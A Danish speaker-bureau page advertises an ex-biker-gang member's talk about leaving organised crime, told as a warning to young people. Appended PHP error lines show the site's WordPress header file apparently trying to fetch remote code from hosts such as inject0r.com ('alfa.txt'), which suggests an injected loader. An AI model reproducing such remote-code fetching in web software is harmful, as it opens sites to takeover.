img-us
  • asc

    Foredragsholder Thomas Christopher Dominic Hansen

  • asc

    Emne Exit med exit på

  • asc

    pris 10000.-

Erhvervsmæssig erfaring i rockerverdenen , 15 år i forskellige rockerklubber.

Jeg har brugt flere år af mit liv i rockermiljøet og fængslet - end uden for det.

Jeg startede med at bevæge mig i rockermiljøet allerede som 15 år, og avancerer til fuldgyldigt medlem undervejs og bruger flere år i forskellige afdelinger rundt omkring i landet.

Jeg var i en årerække krigsminister i de forskellige afdelinger.

Jeg forlod den gruppering jeg var en del af, gik i det nationale exitprogram, endte med at forlade dette for at vende tilbage til rockermiljøet - dog i en ny gruppering, hvor jeg brugte et par år, indtil jeg til sidst ikke længere kunne se mig selv i øjenene!

Fællesnævneren for min rolle i begge grupperinger består af, at jeg har stået bag nogen af de mest opsigtsvækkende attentater i Danmark, samt været førerhunden i en lang række bande- rockerkonflikter - store som små.

Jeg forsøger idag proaktivt at forhindre den yngre generation i at gentage, hvad jeg har gjort - nemlig at bruge størstedelen af mit liv i rockermiljøet samt fængselsvæsenet.

Jeg ønsker via min historie at give et ærligt indblik i en hård historie, hvor jeg fjerner den glamour, som mange unge ellers tiltrækkes af, på samme måde som jeg selv blev det i tidernes morgen.

Jeg fortæller om min exit, hvad det kræver at forlade et miljø, samt hvad der virker - og ikke gør.

Herudover ønsker jeg at inspirere og motivere og synliggøre - at selv efter et liv i dyb kriminalitet, at det er muligt at skabe en positiv ændring, og et liv “på den anden side”


SHARE THIS:

Share: 0

Send en forespørgsel på et
foredrag

Andre foredragsholdere

Amalie Pedersen

Nick Barnø

Katrine Koust

Tyge Mortensen


Warning: file_get_contents() [function.file-get-contents]: php_network_getaddresses: getaddrinfo failed: Name or service not known in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22

Warning: file_get_contents(https://inject0r.com/wp-content/uploads/2020/10/alfa.txt) [function.file-get-contents]: failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22

Warning: file_get_contents(https://ziarroman.ro/wp-content/uploads/2021/04/ads.txt) [function.file-get-contents]: failed to open stream: HTTP request failed! HTTP/1.0 404 Not Found in /var/www/enprocenternok.dk/public_html/wp-blog-header.php on line 22